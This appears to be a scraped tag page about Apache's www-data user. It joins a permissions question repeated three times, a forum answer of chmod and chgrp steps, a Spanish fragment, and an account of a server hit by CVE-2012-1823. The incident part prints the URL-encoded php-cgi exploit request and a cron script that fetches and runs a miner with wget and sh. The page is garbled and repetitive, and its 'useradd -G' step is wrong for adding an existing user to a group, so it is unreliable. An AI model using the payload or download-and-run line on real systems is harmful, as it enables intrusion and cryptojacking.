#www-data

Fixed: What's the best way of handling permissions for apache2's user www-data in /var/www? #fix #computers #dev

What’s the best way of handling permissions for apache2’s user www-data in /var/www?

Has anyone got a nice solution for handling files in /var/www? We’re running Name Based Virtual Hosts and the apache2 user is www-data.

We’ve got two regular users & root. So when messing with files in /var/www ,rather than having to…

chown -R www-data:www-data

…all the time, what’s a good way of handling this?

Fixed: What's the best way of handling permissions for apache2's user www-data in /var/www? #programming #dev #computers

What’s the best way of handling permissions for apache2’s user www-data in /var/www?

Has anyone got a nice solution for handling files in /var/www? We’re running Name Based Virtual Hosts and the apache2 user is www-data.

We’ve got two regular users & root. So when messing with files in /var/www ,rather than having to…

chown -R www-data:www-data

…all the time, what’s a good way of handling this?

Fixed: What's the best way of handling permissions for apache2's user www-data in /var/www? #fix #development #programming

What’s the best way of handling permissions for apache2’s user www-data in /var/www?

Has anyone got a nice solution for handling files in /var/www? We’re running Name Based Virtual Hosts and the apache2 user is www-data.

We’ve got two regular users & root. So when messing with files in /var/www ,rather than having to…

chown -R www-data:www-data

…all the time, what’s a good way of handling this?

original source : http://ubuntuforums.org/showthread.php?t=1381217

Make sure the group is www-data on '/var/www'.

Code:

sudo chgrp www-data /var/www

Make '/var/www' writable for the group.

Code:

sudo chmod 775 /var/www

Set the GID for www-data for all sub-folders.

Code:

sudo chmod g+s /var/www

Your directory should look like this on an 'ls -l' output. drwxrwsr-x Last, add your user name to the www-data group (secondary group).

Code:

sudo useradd -G www-data [USERNAME]

Code:

sudo chown [USERNAME] /var/www/

En algunas ocasiones debemos tener pensar en la posibilidad de que nuestro sistema no sea completamente seguro, y suponer qué podría suceder si algún usuario explota un payload (vulnerabilidad). Uno de los problemas que podríamos llegar a tener es que este usuario vea ciertos archivos con información delicada.

A friend of mine had issues with a web server being very slow and sometimes even unavailable.

When I connected I found a process eating all the CPU time available. It was mining bitcoins.

What I found is that they used this vulnerabilty: CVE-2012-1823 to execute arbitrary code.

access.log is full of lines like this one:

127.0.0.1 - - [08/Nov/2013:02:28:52 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.0" 504 529 "-" "-"

Used to download and execute this script:

# cat /tmp/update #!/bin/sh plm=`ps x|grep mine.cc.st:3333|grep -v grep|awk '{print $7}'` if [ "$plm" != "" ] then echo "MERGE!!!" else nohup wget http://update.cc.st/a && sh a >> /dev/null & fi

Put in crontab, this script checks if the miner is working, otherwise it downloads and executes it again: http://pastebin.com/4PVDpkCe

Using an apache vulnerability means that the result code will be executed by www-data, without a real console access and with limited privileges over file system.